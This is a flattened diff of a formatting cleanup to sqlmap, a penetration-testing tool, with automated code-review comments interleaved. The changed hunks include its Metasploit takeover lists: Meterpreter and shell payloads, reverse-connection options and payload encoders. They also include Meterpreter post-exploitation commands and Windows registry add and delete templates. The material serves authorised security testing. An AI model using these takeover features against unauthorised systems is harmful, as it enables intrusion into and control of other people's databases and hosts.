help="Local path where Metasploit Framework " help="Local path where Metasploit Framework is installed")
"is installed")
takeover.add_option("--tmp-path", dest="tmpPath", takeover.add_option("--tmp-path", dest="tmpPath",
help="Remote absolute path of temporary files " help="Remote absolute path of temporary files directory")
"directory")
# Windows registry options # Windows registry options
windows = OptionGroup(parser, "Windows registry access", "These " windows = OptionGroup(parser, "Windows registry access", "These options can be used to access the back-end database management system Windows registry")
"options can be used to access the back-end "
"database management system Windows "
"registry")
windows.add_option("--reg-read", dest="regRead", windows.add_option("--reg-read", dest="regRead", action="store_true",
action="store_true", help="Read a Windows registry key value")
help="Read a Windows registry key value")
windows.add_option("--reg-add", dest="regAdd", windows.add_option("--reg-add", dest="regAdd", action="store_true",
action="store_true", help="Write a Windows registry key value data")
help="Write a Windows registry key value data")
windows.add_option("--reg-del", dest="regDel", windows.add_option("--reg-del", dest="regDel", action="store_true",
action="store_true", help="Delete a Windows registry key value")
help="Delete a Windows registry key value")
windows.add_option("--reg-key", dest="regKey", windows.add_option("--reg-key", dest="regKey",
help="Windows registry key") help="Windows registry key")
windows.add_option("--reg-value", dest="regVal", windows.add_option("--reg-value", dest="regVal",
help="Windows registry key value") help="Windows registry key value")
windows.add_option("--reg-data", dest="regData", windows.add_option("--reg-data", dest="regData",
help="Windows registry key value data") help="Windows registry key value data")
windows.add_option("--reg-type", dest="regType", windows.add_option("--reg-type", dest="regType",
help="Windows registry key value type") help="Windows registry key value type")
# General options # General options
general = OptionGroup(parser, "General", "These options can be used " general = OptionGroup(parser, "General", "These options can be used to set some general working parameters")
"to set some general working parameters")
general.add_option("-s", dest="sessionFile", general.add_option("-s", dest="sessionFile",
help="Load session from a stored (.sqlite) file") help="Load session from a stored (.sqlite) file")
general.add_option("-t", dest="trafficFile", general.add_option("-t", dest="trafficFile",
help="Log all HTTP traffic into a " help="Log all HTTP traffic into a textual file")
"textual file")
general.add_option("--batch", dest="batch", general.add_option("--batch", dest="batch", action="store_true",
action="store_true", help="Never ask for user input, use the default behavior")
help="Never ask for user input, use the default behavior")
general.add_option("--binary-fields", dest="binaryFields", general.add_option("--binary-fields", dest="binaryFields",
help="Result fields having binary values (e.g. \"digest\")") help="Result fields having binary values (e.g. \"digest\")")
general.add_option("--check-internet", dest="checkInternet", general.add_option("--check-internet", dest="checkInternet", action="store_true",
action="store_true", help="Check Internet connection before assessing the target")
help="Check Internet connection before assessing the target")
general.add_option("--crawl", dest="crawlDepth", type="int", general.add_option("--crawl", dest="crawlDepth", type="int",
help="Crawl the website starting from the target URL") help="Crawl the website starting from the target URL")
general.add_option("--crawl-exclude", dest="crawlExclude", general.add_option("--crawl-exclude", dest="crawlExclude",
help="Regexp to exclude pages from crawling (e.g. \"logout\")") help="Regexp to exclude pages from crawling (e.g. \"logout\")")
general.add_option("--csv-del", dest="csvDel", general.add_option("--csv-del", dest="csvDel",
help="Delimiting character used in CSV output " help="Delimiting character used in CSV output (default \"%s\")" % defaults.csvDel)
"(default \"%s\")" % defaults.csvDel)
general.add_option("--charset", dest="charset", general.add_option("--charset", dest="charset",
help="Blind SQL injection charset (e.g. \"0123456789abcdef\")") help="Blind SQL injection charset (e.g. \"0123456789abcdef\")")
general.add_option("--dump-format", dest="dumpFormat", general.add_option("--dump-format", dest="dumpFormat",
help="Format of dumped data (CSV (default), HTML or SQLITE)") help="Format of dumped data (CSV (default), HTML or SQLITE)")
general.add_option("--encoding", dest="encoding", general.add_option("--encoding", dest="encoding",
help="Character encoding used for data retrieval (e.g. GBK)") help="Character encoding used for data retrieval (e.g. GBK)")
general.add_option("--eta", dest="eta", general.add_option("--eta", dest="eta", action="store_true",
action="store_true", help="Display for each output the estimated time of arrival")
help="Display for each output the estimated time of arrival")
general.add_option("--flush-session", dest="flushSession", general.add_option("--flush-session", dest="flushSession", action="store_true",
action="store_true", help="Flush session files for current target")
help="Flush session files for current target")
general.add_option("--forms", dest="forms", general.add_option("--forms", dest="forms", action="store_true",
action="store_true", help="Parse and test forms on target URL")
help="Parse and test forms on target URL")
general.add_option("--fresh-queries", dest="freshQueries", general.add_option("--fresh-queries", dest="freshQueries", action="store_true",
action="store_true", help="Ignore query results stored in session file")
help="Ignore query results stored in session file")
general.add_option("--har", dest="harFile", general.add_option("--har", dest="harFile",
help="Log all HTTP traffic into a HAR file") help="Log all HTTP traffic into a HAR file")
general.add_option("--hex", dest="hexConvert", general.add_option("--hex", dest="hexConvert", action="store_true",
action="store_true", help="Use DBMS hex function(s) for data retrieval")
help="Use DBMS hex function(s) for data retrieval")
general.add_option("--output-dir", dest="outputDir", general.add_option("--output-dir", dest="outputDir", action="store",
action="store", help="Custom output directory path")
help="Custom output directory path")
general.add_option("--parse-errors", dest="parseErrors", general.add_option("--parse-errors", dest="parseErrors", action="store_true",
action="store_true", help="Parse and display DBMS error messages from responses")
help="Parse and display DBMS error messages from responses")
general.add_option("--save", dest="saveConfig", general.add_option("--save", dest="saveConfig",
help="Save options to a configuration INI file") help="Save options to a configuration INI file")
general.add_option("--scope", dest="scope", general.add_option("--scope", dest="scope",
help="Regexp to filter targets from provided proxy log") help="Regexp to filter targets from provided proxy log")
@ -697,77 +601,65 @@ def cmdLineParser(argv=None):
general.add_option("--test-skip", dest="testSkip", general.add_option("--test-skip", dest="testSkip",
help="Skip tests by payloads and/or titles (e.g. BENCHMARK)") help="Skip tests by payloads and/or titles (e.g. BENCHMARK)")
general.add_option("--update", dest="updateAll", general.add_option("--update", dest="updateAll", action="store_true",
action="store_true", help="Update sqlmap")
help="Update sqlmap")
# Miscellaneous options # Miscellaneous options
miscellaneous = OptionGroup(parser, "Miscellaneous") miscellaneous = OptionGroup(parser, "Miscellaneous")
miscellaneous.add_option("-z", dest="mnemonics", miscellaneous.add_option("-z", dest="mnemonics",
help="Use short mnemonics (e.g. \"flu,bat,ban,tec=EU\")") help="Use short mnemonics (e.g. \"flu,bat,ban,tec=EU\")")
miscellaneous.add_option("--alert", dest="alert", miscellaneous.add_option("--alert", dest="alert",
help="Run host OS command(s) when SQL injection is found") help="Run host OS command(s) when SQL injection is found")
miscellaneous.add_option("--answers", dest="answers", miscellaneous.add_option("--answers", dest="answers",
help="Set question answers (e.g. \"quit=N,follow=N\")") help="Set question answers (e.g. \"quit=N,follow=N\")")
miscellaneous.add_option("--beep", dest="beep", action="store_true", miscellaneous.add_option("--beep", dest="beep", action="store_true",
help="Beep on question and/or when SQL injection is found") help="Beep on question and/or when SQL injection is found")
miscellaneous.add_option("--cleanup", dest="cleanup", miscellaneous.add_option("--cleanup", dest="cleanup", action="store_true",
action="store_true", help="Clean up the DBMS from sqlmap specific UDF and tables")
help="Clean up the DBMS from sqlmap specific "
"UDF and tables")
miscellaneous.add_option("--dependencies", dest="dependencies", miscellaneous.add_option("--dependencies", dest="dependencies", action="store_true",
action="store_true", help="Check for missing (non-core) sqlmap dependencies")
help="Check for missing (non-core) sqlmap dependencies")
miscellaneous.add_option("--disable-coloring", dest="disableColoring", miscellaneous.add_option("--disable-coloring", dest="disableColoring", action="store_true",
action="store_true", help="Disable console output coloring")
help="Disable console output coloring")
miscellaneous.add_option("--gpage", dest="googlePage", type="int", miscellaneous.add_option("--gpage", dest="googlePage", type="int",
help="Use Google dork results from specified page number") help="Use Google dork results from specified page number")
miscellaneous.add_option("--identify-waf", dest="identifyWaf", miscellaneous.add_option("--identify-waf", dest="identifyWaf", action="store_true",
action="store_true", help="Make a thorough testing for a WAF/IPS/IDS protection")
help="Make a thorough testing for a WAF/IPS/IDS protection")
miscellaneous.add_option("--mobile", dest="mobile", miscellaneous.add_option("--mobile", dest="mobile", action="store_true",
action="store_true", help="Imitate smartphone through HTTP User-Agent header")
help="Imitate smartphone through HTTP User-Agent header")
miscellaneous.add_option("--offline", dest="offline", miscellaneous.add_option("--offline", dest="offline", action="store_true",
action="store_true", help="Work in offline mode (only use session data)")
help="Work in offline mode (only use session data)")
miscellaneous.add_option("--purge-output", dest="purgeOutput", miscellaneous.add_option("--purge-output", dest="purgeOutput", action="store_true",
action="store_true", help="Safely remove all content from output directory")
help="Safely remove all content from output directory")
miscellaneous.add_option("--skip-waf", dest="skipWaf", miscellaneous.add_option("--skip-waf", dest="skipWaf", action="store_true",
action="store_true", help="Skip heuristic detection of WAF/IPS/IDS protection")
help="Skip heuristic detection of WAF/IPS/IDS protection")
miscellaneous.add_option("--smart", dest="smart", miscellaneous.add_option("--smart", dest="smart", action="store_true",
action="store_true", help="Conduct thorough tests only if positive heuristic(s)")
help="Conduct thorough tests only if positive heuristic(s)")
miscellaneous.add_option("--sqlmap-shell", dest="sqlmapShell", action="store_true", miscellaneous.add_option("--sqlmap-shell", dest="sqlmapShell", action="store_true",
help="Prompt for an interactive sqlmap shell") help="Prompt for an interactive sqlmap shell")
miscellaneous.add_option("--tmp-dir", dest="tmpDir", miscellaneous.add_option("--tmp-dir", dest="tmpDir",
help="Local directory for storing temporary files") help="Local directory for storing temporary files")
miscellaneous.add_option("--web-root", dest="webRoot", miscellaneous.add_option("--web-root", dest="webRoot",
help="Web server document root directory (e.g. \"/var/www\")") help="Web server document root directory (e.g. \"/var/www\")")
miscellaneous.add_option("--wizard", dest="wizard", miscellaneous.add_option("--wizard", dest="wizard", action="store_true",
action="store_true", help="Simple wizard interface for beginner users")
help="Simple wizard interface for beginner users")
# Hidden and/or experimental options # Hidden and/or experimental options
parser.add_option("--dummy", dest="dummy", action="store_true", parser.add_option("--dummy", dest="dummy", action="store_true",
@ -976,9 +868,7 @@ def cmdLineParser(argv=None):
if args.dummy: if args.dummy:
args.url = args.url or DUMMY_URL args.url = args.url or DUMMY_URL
if not any((args.direct, args.url, args.logFile, args.bulkFile, args.googleDork, args.configFile, \ if not any((args.direct, args.url, args.logFile, args.bulkFile, args.googleDork, args.configFile, args.requestFile, args.updateAll, args.smokeTest, args.liveTest, args.wizard, args.dependencies, args.purgeOutput, args.sitemapUrl)):
args.requestFile, args.updateAll, args.smokeTest, args.liveTest, args.wizard, args.dependencies, \
args.purgeOutput, args.sitemapUrl)):
errMsg = "missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --wizard, --update, --purge-output or --dependencies), " errMsg = "missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --wizard, --update, --purge-output or --dependencies), "
errMsg += "use -h for basic or -hh for advanced help\n" errMsg += "use -h for basic or -hh for advanced help\n"
parser.error(errMsg) parser.error(errMsg)


@ -24,18 +24,16 @@ def headersParser(headers):
if not kb.headerPaths: if not kb.headerPaths:
kb.headerPaths = { kb.headerPaths = {
"microsoftsharepointteamservices": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "sharepoint.xml"), "microsoftsharepointteamservices": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "sharepoint.xml"),
"server": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "server.xml"), "server": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "server.xml"),
"servlet-engine": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "servlet-engine.xml"), "servlet-engine": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "servlet-engine.xml"),
"set-cookie": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "set-cookie.xml"), "set-cookie": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "set-cookie.xml"),
"x-aspnet-version": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-aspnet-version.xml"), "x-aspnet-version": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-aspnet-version.xml"),
"x-powered-by": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-powered-by.xml"), "x-powered-by": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-powered-by.xml"),
} }
for header in itertools.ifilter(lambda x: x in kb.headerPaths, headers): for header in itertools.ifilter(lambda x: x in kb.headerPaths, headers):
value = headers[header] value = headers[header]
xmlfile = kb.headerPaths[header] xmlfile = kb.headerPaths[header]
handler = FingerprintHandler(value, kb.headersFp) handler = FingerprintHandler(value, kb.headersFp)
parseXmlFile(xmlfile, handler) parseXmlFile(xmlfile, handler)
parseXmlFile(paths.GENERIC_XML, handler) parseXmlFile(paths.GENERIC_XML, handler)


@ -110,7 +110,9 @@ def forgeHeaders(items=None, base=None):
kb.mergeCookies = readInput(message, default='Y', boolean=True) kb.mergeCookies = readInput(message, default='Y', boolean=True)
if kb.mergeCookies and kb.injection.place != PLACE.COOKIE: if kb.mergeCookies and kb.injection.place != PLACE.COOKIE:
_ = lambda x: re.sub(r"(?i)\b%s=[^%s]+" % (re.escape(getUnicode(cookie.name)), conf.cookieDel or DEFAULT_COOKIE_DELIMITER), ("%s=%s" % (getUnicode(cookie.name), getUnicode(cookie.value))).replace('\\', r'\\'), x) def _(value):
return re.sub(r"(?i)\b%s=[^%s]+" % (re.escape(getUnicode(cookie.name)), conf.cookieDel or DEFAULT_COOKIE_DELIMITER), ("%s=%s" % (getUnicode(cookie.name), getUnicode(cookie.value))).replace('\\', r'\\'), value)
headers[HTTP_HEADER.COOKIE] = _(headers[HTTP_HEADER.COOKIE]) headers[HTTP_HEADER.COOKIE] = _(headers[HTTP_HEADER.COOKIE])
if PLACE.COOKIE in conf.parameters: if PLACE.COOKIE in conf.parameters:
@ -161,7 +163,7 @@ def checkCharEncoding(encoding, warn=True):
return encoding return encoding
# Reference: http://www.destructor.de/charsets/index.htm # Reference: http://www.destructor.de/charsets/index.htm
translate = {"windows-874": "iso-8859-11", "utf-8859-1": "utf8", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "iso-8859-0": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk", "windows-31j": "cp932", "en": "us"} translate = {"windows-874": "iso-8859-11", "utf-8859-1": "utf8", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "iso-8859-0": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk", "windows-31j": "cp932", "en": "us"}
for delimiter in (';', ',', '('): for delimiter in (';', ',', '('):
if delimiter in encoding: if delimiter in encoding:
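Review bot: In the `_` helper introduced in forgeHeaders (first hunk of this section), `conf.cookieDel or DEFAULT_COOKIE_DELIMITER` is interpolated into the `[^%s]+` character class without `re.escape`, while `cookie.name` right beside it is escaped; if the configured delimiter can ever be a regex-significant character such as `]` or `\`, the pattern changes meaning or fails to compile, so it should read `re.sub(r"(?i)\b%s=[^%s]+" % (re.escape(getUnicode(cookie.name)), re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER)), ...)`. Naming the nested function `_` is also easy to confuse with the throwaway-variable and gettext conventions used elsewhere in the tree; a name like `_mergeCookie` with a one-line docstring ("replace the current value of this cookie in a Cookie header string") would read better. forgeHeaders itself begins outside the hunk.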


@ -187,8 +187,7 @@ class Connect(object):
if not kb.dnsMode and conn: if not kb.dnsMode and conn:
headers = conn.info() headers = conn.info()
if headers and hasattr(headers, "getheader") and (headers.getheader(HTTP_HEADER.CONTENT_ENCODING, "").lower() in ("gzip", "deflate")\ if headers and hasattr(headers, "getheader") and (headers.getheader(HTTP_HEADER.CONTENT_ENCODING, "").lower() in ("gzip", "deflate") or "text" not in headers.getheader(HTTP_HEADER.CONTENT_TYPE, "").lower()):
or "text" not in headers.getheader(HTTP_HEADER.CONTENT_TYPE, "").lower()):
retVal = conn.read(MAX_CONNECTION_TOTAL_SIZE) retVal = conn.read(MAX_CONNECTION_TOTAL_SIZE)
if len(retVal) == MAX_CONNECTION_TOTAL_SIZE: if len(retVal) == MAX_CONNECTION_TOTAL_SIZE:
warnMsg = "large compressed response detected. Disabling compression" warnMsg = "large compressed response detected. Disabling compression"
@ -241,27 +240,27 @@ class Connect(object):
kb.requestCounter += 1 kb.requestCounter += 1
threadData.lastRequestUID = kb.requestCounter threadData.lastRequestUID = kb.requestCounter
url = kwargs.get("url", None) or conf.url url = kwargs.get("url", None) or conf.url
get = kwargs.get("get", None) get = kwargs.get("get", None)
post = kwargs.get("post", None) post = kwargs.get("post", None)
method = kwargs.get("method", None) method = kwargs.get("method", None)
cookie = kwargs.get("cookie", None) cookie = kwargs.get("cookie", None)
ua = kwargs.get("ua", None) or conf.agent ua = kwargs.get("ua", None) or conf.agent
referer = kwargs.get("referer", None) or conf.referer referer = kwargs.get("referer", None) or conf.referer
host = kwargs.get("host", None) or conf.host host = kwargs.get("host", None) or conf.host
direct_ = kwargs.get("direct", False) direct_ = kwargs.get("direct", False)
multipart = kwargs.get("multipart", None) multipart = kwargs.get("multipart", None)
silent = kwargs.get("silent", False) silent = kwargs.get("silent", False)
raise404 = kwargs.get("raise404", True) raise404 = kwargs.get("raise404", True)
timeout = kwargs.get("timeout", None) or conf.timeout timeout = kwargs.get("timeout", None) or conf.timeout
auxHeaders = kwargs.get("auxHeaders", None) auxHeaders = kwargs.get("auxHeaders", None)
response = kwargs.get("response", False) response = kwargs.get("response", False)
ignoreTimeout = kwargs.get("ignoreTimeout", False) or kb.ignoreTimeout or conf.ignoreTimeouts ignoreTimeout = kwargs.get("ignoreTimeout", False) or kb.ignoreTimeout or conf.ignoreTimeouts
refreshing = kwargs.get("refreshing", False) refreshing = kwargs.get("refreshing", False)
retrying = kwargs.get("retrying", False) retrying = kwargs.get("retrying", False)
crawling = kwargs.get("crawling", False) crawling = kwargs.get("crawling", False)
checking = kwargs.get("checking", False) checking = kwargs.get("checking", False)
skipRead = kwargs.get("skipRead", False) skipRead = kwargs.get("skipRead", False)
if multipart: if multipart:
post = multipart post = multipart
@ -1040,7 +1039,7 @@ class Connect(object):
name = safeVariableNaming(name) name = safeVariableNaming(name)
elif name in keywords: elif name in keywords:
name = "%s%s" % (name, EVALCODE_KEYWORD_SUFFIX) name = "%s%s" % (name, EVALCODE_KEYWORD_SUFFIX)
value = urldecode(value, convall=True, spaceplus=(item==post and kb.postSpaceToPlus)) value = urldecode(value, convall=True, spaceplus=(item == post and kb.postSpaceToPlus))
variables[name] = value variables[name] = value
if cookie: if cookie:
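Review bot: The joined `Content-Encoding`/`Content-Type` condition in the first hunk (the `conn.info()` block) now runs well past 200 columns and performs two `headers.getheader(...).lower()` calls inside a single boolean expression, which is the kind of line the PEP 8 pass in this commit is otherwise removing. Splitting the `hasattr` guard from the header tests and naming the two header values preserves the short-circuit semantics and makes the gzip/deflate intent readable; a sketch follows. This assumes the `if` has no `else` branch below the hunk, which is not visible here. The enclosing Connect method begins and ends outside the hunk.
```python
if not kb.dnsMode and conn:
    headers = conn.info()
    if headers and hasattr(headers, "getheader"):
        contentEncoding = headers.getheader(HTTP_HEADER.CONTENT_ENCODING, "").lower()
        contentType = headers.getheader(HTTP_HEADER.CONTENT_TYPE, "").lower()
        if contentEncoding in ("gzip", "deflate") or "text" not in contentType:
            retVal = conn.read(MAX_CONNECTION_TOTAL_SIZE)
            # … unchanged: large-compressed-response warning …
```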


@ -48,7 +48,7 @@ class HTTPSConnection(httplib.HTTPSConnection):
# Reference(s): https://docs.python.org/2/library/ssl.html#ssl.SSLContext # Reference(s): https://docs.python.org/2/library/ssl.html#ssl.SSLContext
# https://www.mnot.net/blog/2014/12/27/python_2_and_tls_sni # https://www.mnot.net/blog/2014/12/27/python_2_and_tls_sni
if re.search(r"\A[\d.]+\Z", self.host) is None and kb.tlsSNI.get(self.host) != False and hasattr(ssl, "SSLContext"): if re.search(r"\A[\d.]+\Z", self.host) is None and kb.tlsSNI.get(self.host) is not False and hasattr(ssl, "SSLContext"):
for protocol in filter(lambda _: _ >= ssl.PROTOCOL_TLSv1, _protocols): for protocol in filter(lambda _: _ >= ssl.PROTOCOL_TLSv1, _protocols):
try: try:
sock = create_sock() sock = create_sock()
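Review bot: `kb.tlsSNI.get(self.host) is not False` is the PEP 8 spelling, but it is also a small semantic change from `!= False`: only the `False` singleton now disables SNI, whereas a stored `0` or `None` would proceed with it; this is harmless if `kb.tlsSNI` only ever holds booleans, which the hunk does not show. Separately, the IP-literal guard `re.search(r"\A[\d.]+\Z", self.host)` recognises dotted IPv4 only, so an IPv6 literal would still be passed as the SNI server name, which RFC 6066 does not permit; a comment such as `# NOTE: IPv4 literal check only; IPv6 literals are not excluded from SNI` would record the limitation. The enclosing connect method begins outside the hunk.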


@ -175,10 +175,7 @@ def _goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, char
# forge the SQL limiting the query output one entry at a time # forge the SQL limiting the query output one entry at a time
# NOTE: we assume that only queries that get data from a table # NOTE: we assume that only queries that get data from a table
# can return multiple entries # can return multiple entries
if fromUser and " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() \ if fromUser and " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) and not re.search(SQL_SCALAR_REGEX, expression, re.I):
not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not \
expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) \
and not re.search(SQL_SCALAR_REGEX, expression, re.I):
expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression) expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression)
if limitCond: if limitCond:
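Review bot: The joined condition on the `fromUser and " FROM " in expression.upper()` line calls `Backend.getIdentifiedDbms()` three times and spells `(X not in T) or (X in T and not E)`, which by short-circuit evaluation is just `X not in T or not E`. Hoisting the DBMS lookup and simplifying gives the same result in far fewer characters: `dbms = Backend.getIdentifiedDbms()` followed by `if fromUser and " FROM " in expression.upper() and (dbms not in FROM_DUMMY_TABLE or not expression.upper().endswith(FROM_DUMMY_TABLE[dbms])) and not re.search(SQL_SCALAR_REGEX, expression, re.I):`; `FROM_DUMMY_TABLE[dbms]` is still only evaluated when `dbms` is a key. _goInferenceProxy begins and ends outside the hunk.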


@ -19,4 +19,3 @@ def getPageTemplate(payload, place):
retVal = kb.pageTemplates[(payload, place)] retVal = kb.pageTemplates[(payload, place)]
return retVal return retVal


@ -172,9 +172,9 @@ class Abstraction(Web, UDF, XP_cmdshell):
inject.goStacked(expression) inject.goStacked(expression)
# TODO: add support for PostgreSQL # TODO: add support for PostgreSQL
#elif Backend.isDbms(DBMS.PGSQL): # elif Backend.isDbms(DBMS.PGSQL):
# expression = getSQLSnippet(DBMS.PGSQL, "configure_dblink", ENABLE="1") # expression = getSQLSnippet(DBMS.PGSQL, "configure_dblink", ENABLE="1")
# inject.goStacked(expression) # inject.goStacked(expression)
def initEnv(self, mandatory=True, detailed=False, web=False, forceInit=False): def initEnv(self, mandatory=True, detailed=False, web=False, forceInit=False):
self._initRunAs() self._initRunAs()


@ -81,6 +81,7 @@ class Metasploit:
_ = normalizePath(os.path.join(_, "..")) _ = normalizePath(os.path.join(_, ".."))
if _ == old: if _ == old:
break break
self._msfCli = "%s & ruby %s" % (_, self._msfCli) self._msfCli = "%s & ruby %s" % (_, self._msfCli)
self._msfConsole = "%s & ruby %s" % (_, self._msfConsole) self._msfConsole = "%s & ruby %s" % (_, self._msfConsole)
self._msfEncode = "ruby %s" % self._msfEncode self._msfEncode = "ruby %s" % self._msfEncode
@ -88,60 +89,60 @@ class Metasploit:
self._msfVenom = "%s & ruby %s" % (_, self._msfVenom) self._msfVenom = "%s & ruby %s" % (_, self._msfVenom)
self._msfPayloadsList = { self._msfPayloadsList = {
"windows": { "windows": {
1: ("Meterpreter (default)", "windows/meterpreter"), 1: ("Meterpreter (default)", "windows/meterpreter"),
2: ("Shell", "windows/shell"), 2: ("Shell", "windows/shell"),
3: ("VNC", "windows/vncinject"), 3: ("VNC", "windows/vncinject"),
}, },
"linux": { "linux": {
1: ("Shell (default)", "linux/x86/shell"), 1: ("Shell (default)", "linux/x86/shell"),
2: ("Meterpreter (beta)", "linux/x86/meterpreter"), 2: ("Meterpreter (beta)", "linux/x86/meterpreter"),
} }
} }
self._msfConnectionsList = { self._msfConnectionsList = {
"windows": { "windows": {
1: ("Reverse TCP: Connect back from the database host to this machine (default)", "reverse_tcp"), 1: ("Reverse TCP: Connect back from the database host to this machine (default)", "reverse_tcp"),
2: ("Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535", "reverse_tcp_allports"), 2: ("Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535", "reverse_tcp_allports"),
3: ("Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP", "reverse_http"), 3: ("Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP", "reverse_http"),
4: ("Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS", "reverse_https"), 4: ("Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS", "reverse_https"),
5: ("Bind TCP: Listen on the database host for a connection", "bind_tcp"), 5: ("Bind TCP: Listen on the database host for a connection", "bind_tcp"),
}, },
"linux": { "linux": {
1: ("Reverse TCP: Connect back from the database host to this machine (default)", "reverse_tcp"), 1: ("Reverse TCP: Connect back from the database host to this machine (default)", "reverse_tcp"),
2: ("Bind TCP: Listen on the database host for a connection", "bind_tcp"), 2: ("Bind TCP: Listen on the database host for a connection", "bind_tcp"),
} }
} }
self._msfEncodersList = { self._msfEncodersList = {
"windows": { "windows": {
1: ("No Encoder", "generic/none"), 1: ("No Encoder", "generic/none"),
2: ("Alpha2 Alphanumeric Mixedcase Encoder", "x86/alpha_mixed"), 2: ("Alpha2 Alphanumeric Mixedcase Encoder", "x86/alpha_mixed"),
3: ("Alpha2 Alphanumeric Uppercase Encoder", "x86/alpha_upper"), 3: ("Alpha2 Alphanumeric Uppercase Encoder", "x86/alpha_upper"),
4: ("Avoid UTF8/tolower", "x86/avoid_utf8_tolower"), 4: ("Avoid UTF8/tolower", "x86/avoid_utf8_tolower"),
5: ("Call+4 Dword XOR Encoder", "x86/call4_dword_xor"), 5: ("Call+4 Dword XOR Encoder", "x86/call4_dword_xor"),
6: ("Single-byte XOR Countdown Encoder", "x86/countdown"), 6: ("Single-byte XOR Countdown Encoder", "x86/countdown"),
7: ("Variable-length Fnstenv/mov Dword XOR Encoder", "x86/fnstenv_mov"), 7: ("Variable-length Fnstenv/mov Dword XOR Encoder", "x86/fnstenv_mov"),
8: ("Polymorphic Jump/Call XOR Additive Feedback Encoder", "x86/jmp_call_additive"), 8: ("Polymorphic Jump/Call XOR Additive Feedback Encoder", "x86/jmp_call_additive"),
9: ("Non-Alpha Encoder", "x86/nonalpha"), 9: ("Non-Alpha Encoder", "x86/nonalpha"),
10: ("Non-Upper Encoder", "x86/nonupper"), 10: ("Non-Upper Encoder", "x86/nonupper"),
11: ("Polymorphic XOR Additive Feedback Encoder (default)", "x86/shikata_ga_nai"), 11: ("Polymorphic XOR Additive Feedback Encoder (default)", "x86/shikata_ga_nai"),
12: ("Alpha2 Alphanumeric Unicode Mixedcase Encoder", "x86/unicode_mixed"), 12: ("Alpha2 Alphanumeric Unicode Mixedcase Encoder", "x86/unicode_mixed"),
13: ("Alpha2 Alphanumeric Unicode Uppercase Encoder", "x86/unicode_upper"), 13: ("Alpha2 Alphanumeric Unicode Uppercase Encoder", "x86/unicode_upper"),
} }
} }
self._msfSMBPortsList = { self._msfSMBPortsList = {
"windows": { "windows": {
1: ("139/TCP", "139"), 1: ("139/TCP", "139"),
2: ("445/TCP (default)", "445"), 2: ("445/TCP (default)", "445"),
} }
} }
self._portData = { self._portData = {
"bind": "remote port number", "bind": "remote port number",
"reverse": "local port number", "reverse": "local port number",
} }
def _skeletonSelection(self, msg, lst=None, maxValue=1, default=1): def _skeletonSelection(self, msg, lst=None, maxValue=1, default=1):
if Backend.isOs(OS.WINDOWS): if Backend.isOs(OS.WINDOWS):
@ -484,10 +485,13 @@ class Metasploit:
send_all(proc, "use espia\n") send_all(proc, "use espia\n")
send_all(proc, "use incognito\n") send_all(proc, "use incognito\n")
# This extension is loaded by default since Metasploit > 3.7
#send_all(proc, "use priv\n") # This extension is loaded by default since Metasploit > 3.7:
# This extension freezes the connection on 64-bit systems # send_all(proc, "use priv\n")
#send_all(proc, "use sniffer\n")
# This extension freezes the connection on 64-bit systems:
# send_all(proc, "use sniffer\n")
send_all(proc, "sysinfo\n") send_all(proc, "sysinfo\n")
send_all(proc, "getuid\n") send_all(proc, "getuid\n")


@ -33,19 +33,19 @@ class Registry:
readParse = "REG QUERY \"" + self._regKey + "\" /v \"" + self._regValue + "\"" readParse = "REG QUERY \"" + self._regKey + "\" /v \"" + self._regValue + "\""
self._batRead = ( self._batRead = (
"@ECHO OFF\r\n", "@ECHO OFF\r\n",
readParse, readParse,
) )
self._batAdd = ( self._batAdd = (
"@ECHO OFF\r\n", "@ECHO OFF\r\n",
"REG ADD \"%s\" /v \"%s\" /t %s /d %s /f" % (self._regKey, self._regValue, self._regType, self._regData), "REG ADD \"%s\" /v \"%s\" /t %s /d %s /f" % (self._regKey, self._regValue, self._regType, self._regData),
) )
self._batDel = ( self._batDel = (
"@ECHO OFF\r\n", "@ECHO OFF\r\n",
"REG DELETE \"%s\" /v \"%s\" /f" % (self._regKey, self._regValue), "REG DELETE \"%s\" /v \"%s\" /f" % (self._regKey, self._regValue),
) )
def _createLocalBatchFile(self): def _createLocalBatchFile(self):
self._batPathFp = open(self._batPathLocal, "w") self._batPathFp = open(self._batPathLocal, "w")


@ -112,10 +112,10 @@ class Web:
if self.webApi in getPublicTypeMembers(WEB_API, True): if self.webApi in getPublicTypeMembers(WEB_API, True):
multipartParams = { multipartParams = {
